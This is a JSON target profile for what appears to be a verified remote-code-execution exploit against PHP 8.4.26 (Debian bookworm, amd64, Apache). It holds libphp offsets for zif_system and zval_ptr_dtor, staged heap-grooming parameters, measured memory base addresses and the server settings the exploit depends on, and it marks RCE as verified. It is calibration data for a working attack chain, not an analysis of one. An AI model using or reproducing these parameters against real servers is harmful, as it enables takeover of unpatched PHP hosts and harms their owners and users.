{
  "name": "php-8.4.26-bookworm-amd64",
  "php_version": "8.4.26",
  "branch": "8.4",
  "fixed_in": "8.4.27",
  "sapi": "apache2handler",
  "verified": true,
  "rce": true,
  "upstream_profile": "bookworm",
  "libphp": {
    "zif_system": "0x465370",
    "zval_ptr_dtor": "0x65eb60",
    "htdata": "0x690d8"
  },
  "stages": {
    "stage1_n": 841,
    "stage1_forge_len": 79,
    "stage2_t": 406,
    "stage2_v": 16,
    "stage3_pads": [
      [
        31,
        31
      ],
      [
        31,
        31
      ],
      [
        31,
        31
      ],
      [
        31,
        31
      ],
      [
        31,
        31
      ],
      [
        31,
        31
      ]
    ],
    "stage3_carrier": true
  },
  "config": {
    "memory_limit": 8388608,
    "display_errors": "On (web SAPI, stage-1 leak succeeded)",
    "session_upload_progress": "On",
    "workers": 1
  },
  "measured": {
    "chunk_base": "0x7ffffc400000",
    "libphp_base": "0x7ffffe013000"
  },
  "status": "RCE verified at 8M and 128M (huge_mb = limit + 12)",
  "oom_margin_mb": 12,
  "memory_limit_tested_mb": [
    8,
    128
  ],
  "distro": "debian",
  "arch": "amd64",
  "oom_mb": 12
}